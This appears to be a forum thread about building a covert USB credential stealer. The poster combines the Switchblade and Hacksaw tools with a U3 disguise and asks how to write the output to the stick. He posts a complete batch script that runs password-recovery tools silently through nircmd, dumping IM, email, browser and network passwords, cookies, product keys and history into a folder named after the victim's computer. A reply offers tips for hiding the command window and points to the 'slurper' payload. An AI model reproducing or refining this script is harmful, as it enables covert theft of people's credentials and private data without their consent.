Usb... well the names open...

chrstfer

ok, im trying to make a version of hackblade using the programs from switchblade(no u3) and hacksaw. im basically

pulling a whole lot of programs together, using u3, to make somthing better than some of the others. itll probably be

pretty rough for a while, but with help i think ill pull it off.

onto my question, for now: the no u3 version has a folder called dump, and i would like to point it into the actual drive, therefore allowing it to run all the programs, on u3, and dumping them through into the drive. i could do this, other than the drive letter could be random, and the u3 "disk" drive isnt the same drive letter (of course). its also read only, (as far as i know) so i cant just write the code to there. my code is the same (so far) as no u3, with the .bat file that is actually putting the files out into drive being:

@echo off
nircmd.exe execmd mkdir "dump\~$sys.computername$"
nircmd.exe execmd .\batexe\mspass.exe /shtml "dump\~$sys.computername$\IMClients.html"
nircmd.exe execmd .\batexe\mailpv.exe /shtml "dump\~$sys.computername$\mail.html"
nircmd.exe execmd .\batexe\pspv.exe /shtml "dump\~$sys.computername$\selected.html"
nircmd.exe execmd .\batexe\iehv.exe /shtml "dump\~$sys.computername$\history.html"
nircmd.exe execmd .\batexe\ProduKey.exe /shtml "dump\~$sys.computername$\ProductKey.html"
nircmd.exe execmd .\batexe\iepv.exe /shtml "dump\~$sys.computername$\IEPasswords.html"
nircmd.exe execmd .\batexe\netpass.exe /shtml "dump\~$sys.computername$\NetworkPasswords.html"
nircmd.exe execmd .\batexe\pstpassword.exe /shtml "dump\~$sys.computername$\PstPassword.html"
nircmd.exe execmd .\batexe\cports.exe /shtml "dump\~$sys.computername$\OpenPorts.html"
nircmd.exe execmd .\batexe\awatch.exe /shtml "dump\~$sys.computername$\NetworkAdapter.html"
nircmd.exe execmd .\batexe\mzcv.exe /shtml "dump\~$sys.computername$\MozillaCookies.html"
nircmd.exe execmd .\batexe\wul.exe /shtml "dump\~$sys.computername$\InstalledUpdates.html"
nircmd.exe execmd .\batexe\strun.exe /shtml "dump\~$sys.computername$\Startup.html"
nircmd.exe execmd .\batexe\servimin.exe /shtml "dump\~$sys.computername$\Services.html"
nircmd.exe win close ititle "Remo"

its simple, but i cant get it to dump into the the usb type drive.

the programs im using are, so far:

Usb switchblade

Usb hacksaw (not yet implimented)

u3 (so the u3 drive looks real, im using this)

nircmd

a whole host of password recovery tools

and thats about it.

sorry if its hard to read, ill make it better tomorrow.

why not turn all that into a string and that way you dont have to use nircmd to hide the cmd box?

but to answer your question, there is a bat that scans the drive and looks to a special file. Look at the slurper payload and how that is executed and that should get you where you need to go. Its almost at the bare min... I just didnt code an exe for the iso part.